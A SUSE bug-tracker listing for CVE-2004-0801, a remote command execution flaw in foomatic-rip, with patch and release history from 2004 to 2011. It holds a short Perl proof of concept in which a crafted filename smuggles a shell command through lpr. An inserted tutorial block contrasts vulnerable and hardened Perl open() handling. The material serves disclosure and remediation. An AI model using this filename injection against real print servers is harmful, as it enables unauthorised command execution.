Bugzilla – Full Text Bug Listing

| Summary: | VUL-0: CVE-2004-0801: remote command execution in foomatic-rip-hplip | | |
|---|---|---|---|
| Product: | [Novell Products] SUSE Security Incidents | Reporter: | Sebastian Krahmer <krahmer> |
| Component: | General | Assignee: | Security Team bot <security-team> |
| Status: | RESOLVED FIXED | QA Contact: | E-mail List <qa-bugs> |
| Severity: | Major | | |
| Priority: | P2 - High | CC: | jsmeix, meissner, security-team |
| Version: | unspecified | | |
| Target Milestone: | --- | | |
| Hardware: | All | | |
| OS: | Linux | | |
| Whiteboard: | maint:released:11.3:42630 maint:released:11.4:42630 maint:released:sle11-sp1:42614 CVSSv2:NVD:CVE-2004-0558:5.0:(AV:N/AC:L/Au:N/C:N/I:N/A:P) | | |
| Found By: | Other | Services Priority: | |
| Business Priority: | | Blocker: | --- |
| Marketing QA Status: | --- | IT Deployment: | --- |
| Deadline: | 2011-08-22 | | |
| Attachments: | the fix which came via vendor-sec; patchinfo 8.1,8.2; patchinfo 9.0, 9.1; patchinfo sles8; patchinfo sles9 | | |
Description
Sebastian Krahmer
2004-08-25 22:41:30 UTC
On the CUPS server, execute:

```perl
#!/usr/bin/perl
# CUPS PoC remote exploit, requires printing access.
# Bug is in foomatic-rip perl script. It opens PPD files
# without < so if there's a | at the end, it interprets them
# as a command. Furthermore, the arguments for the script are
# merged into one string and afterwards regex'ed out. This allows
# for faking arguments via filenames.
my $ip = "127.0.0.1";
my $ppd_file = "\x01-p\x01|\$(find)|\x01x";
open O, ">$ppd_file" or die $!;
print O "Foo!\n";
close O;
exec("lpr", "./$ppd_file");
```

And see whether a "find" command is started by the CUPS server afterwards.

Tested on SL 8.2, but the current foomatic-rip script seems to be the same and still contains the bugs.
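The two defects named in the description, Perl's two-argument open() and option parsing over a joined argument string, are shown below next to their hardened forms. This is an added example, not the reporter's PoC and not foomatic-rip's own code; the temporary directory, the file name `echo injected |`, the fake PPD content and the argument lists are constructed for the demonstration, and the option name `-p` mirrors the one in the PoC only for illustration.

```perl
#!/usr/bin/perl
# Added example; not the reporter's PoC and not foomatic-rip's own code.
# Shows the Perl open() behaviour behind the bug next to the hardened forms.
# Temp directory, file names and argument lists are constructed for the demo.
use strict;
use warnings;
use Cwd qw(getcwd);
use File::Temp qw(tempdir);
use Getopt::Long qw(GetOptionsFromArray);

# Legacy pattern (the bug class in the report): two-argument open().
# Perl's "magic open" treats a name ending in '|' as a command whose
# output is to be read, so the file name decides whether a process is spawned.
sub read_ppd_legacy {
    my ($name) = @_;
    open(my $fh, $name) or return "open failed: $!\n";
    local $/;                 # slurp mode
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Hardened pattern: three-argument open() with an explicit '<' mode.
# The name is used literally; '|', '>', '<' or surrounding whitespace in it
# cannot change what open() does.
sub read_ppd_safe {
    my ($name) = @_;
    open(my $fh, '<', $name) or return "open failed: $!\n";
    local $/;
    my $data = <$fh>;
    close($fh);
    return $data;
}

# Hardened argument handling: take options from the argument list itself
# instead of joining @ARGV into one string and regexing the options back out.
# Each element stays one word, so a file name that contains "-p something"
# is never mistaken for the -p option.
sub parse_args {
    my @argv = @_;
    my %opt;
    GetOptionsFromArray(\@argv, 'p=s' => \$opt{ppd})
        or die "usage: [-p ppdfile] file...\n";
    return (\%opt, @argv);    # leftover elements are the input files
}

# --- demo ---
my $origin = getcwd();
my $dir    = tempdir(CLEANUP => 1);
chdir($dir) or die "chdir $dir: $!";

# A constructed PPD whose name ends in '|'. To the legacy open the name
# "echo injected |" is a pipeline; to the safe open it is just a file name.
my $odd_name = 'echo injected |';
open(my $out, '>', $odd_name) or die "create $odd_name: $!";
print $out "*PPD-Adobe: \"4.3\"\n*ModelName: \"demo\"\n";
close($out);

print "legacy two-arg open read : ", read_ppd_legacy($odd_name);
print "three-arg open read      : ", read_ppd_safe($odd_name);

# Option parsing: the second job name carries "-p evil.ppd" inside one word.
my ($opt, @files) = parse_args('-p', 'hp.ppd', 'job.ps', 'report -p evil.ppd.ps');
print "ppd option: $opt->{ppd}\n";
print "input file: $_\n" for @files;

chdir($origin);               # leave the temp dir so CLEANUP can remove it
```

Run it with `perl`: the first line printed is the output of the spawned `echo`, not the file's content, which is exactly the behaviour the report describes, while the second line is the PPD header read from the oddly named file. The option parser reports `hp.ppd` as the PPD and keeps `report -p evil.ppd.ps` as an input file name, because Getopt::Long looks at whole argument elements and never re-splits a joined string.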
Patches made and new packages submitted. Please note that this affects package cups (<= SL9.0) and later foomatic-filters (SL9.1, SL9.2). Security-team, please handle the rest of the update process: putonftp, etc. Affected are all SUSE Linux versions. CAN-2004-0801

Created attachment 22980 [details]
the fix which came via vendor-sec

...

CRD around Sept. 7 2004.

From vendor-sec CRD summary:
CAN-2004-0801 foomatic Sep 14 ????UTC (*3)
CAN-2004-0558 CUPS (*1) Sep 06 ????UTC
*1: This cups issue seems to be a mess; from what I've seen, upstream is going to release information for this issue on Sept 1, then 1.1.21 should come out on Sept 7, some on the list seem to think we're releasing on Sept 06. The foomatic issue will probably dictate this since it's a bit higher priority.
*3: These are suggested release dates; if these are problems for anyone, you should probably speak up.

Working again on a solution which covers the vendor-sec patches. Have to adapt the patches to the old versions of foomatic-rip and its predecessor cupsomatic. Wait with tests till I'm ready, please.

Finished with the patches (again :-). Security-team, please proceed in the usual way. Patch-Management: Please check if printing with non-PostScript printers in older SuSE Linux versions is still possible. Didn't have time to install and test these versions, and the patches differ! TIA

Created attachment 23054 [details]
patchinfo 8.1,8.2

Created attachment 23055 [details]
patchinfo 9.0, 9.1

Created attachment 23056 [details]
patchinfo sles8

Created attachment 23057 [details]
patchinfo sles9

Advisories and packages are out.

The foomatic fix was reverted and is not in the current packages! Affected: 9.3, 10.0 and 10.1. Not affected: SLES9, 9.2. So those are still exploitable by this problem. Critical.

Fixed packages submitted for: 9.3, 10.0, 10.1 and STABLE. Security-team, please handle the rest of the process: swamp-id, patchinfo, etc. TIA

swamp: 4432

Approved the update. Thanks!

CVE-2004-0801: CVSS v2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)

The SWAMPID for this issue is 42548. This issue was rated as moderate. Please submit fixed packages until 2011-08-22. When done, please reassign the bug to security-team@suse.de. Patchinfo will be handled by security team.

FYI regarding SLE11-SP2: Submitted HPLIP 3.11.5 to SUSE:SLE-11-SP2:GA via submitrequest 14060: Version upgrade to HPLIP 3.11.5 (Fate #312667) plus fixed CVE-2011-2697 (Bug #698451) plus fixed leftover in CVE-2004-0801 (Bug #59233).

Submitted hplip to SUSE:SLE-11-SP1:Update:Test via submitrequest 14078: Fixed CVE-2011-2697 (bnc#698451) plus fixed leftover in CVE-2004-0801 (bnc#59233). From my point of view the issue is now fixed in all maintained SLE products.

Submitted hplip to openSUSE:11.3:Update:Test via submitrequest 78534: Fixed CVE-2011-2697 (bnc#698451) plus fixed leftover in CVE-2004-0801 (bnc#59233)

Submitted hplip to openSUSE:11.4:Update:Test via submitrequest 78539: Fixed CVE-2011-2697 (bnc#698451) plus fixed leftover in CVE-2004-0801 (bnc#59233). From my point of view the issue is now fixed in all maintained products.

Reopening and reassigning to security-team@suse.de according to comment #21.

FYI regarding openSUSE:Factory: Fixed via version upgrade to current HPLIP 3.11.7 and changes to avoid the security issues. Submitted HPLIP 3.11.7 to the OBS Printing project via submitrequest 78629 and to openSUSE:Factory via submitrequest 78646: Version upgrade to HPLIP 3.11.7 and avoid CVE-2011-2697 (bnc#698451) plus CVE-2004-0801 (bnc#59233) by no longer installing foomatic-rip-hplip and using foomatic-rip from the foomatic-filters RPM instead. From my point of view the issue is now completely fixed in all products. Thanks.

Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs, hplip-hpijs-debuginfo
Products: openSUSE 11.3 (debug, i586, x86_64), openSUSE 11.4 (debug, i586, x86_64)

Update released for: hplip, hplip-debuginfo, hplip-debugsource, hplip-hpijs
Products: SLE-DEBUGINFO 11-SP1 (i386, ia64, ppc64, s390x, x86_64), SLE-DESKTOP 11-SP1 (i386, x86_64), SLE-SERVER 11-SP1 (i386, ia64, ppc64, s390x, x86_64), SLE-SERVER 11-SP1-TERADATA (x86_64), SLES4VMWARE 11-SP1 (i386, x86_64)

Seems we can close it.

This is an autogenerated message for OBS integration: This bug (59233) was mentioned in
https://build.opensuse.org/request/show/78534 11.3:Test / hplip
https://build.opensuse.org/request/show/78539 11.4:Test / hplip
https://build.opensuse.org/request/show/78646 Factory / hplip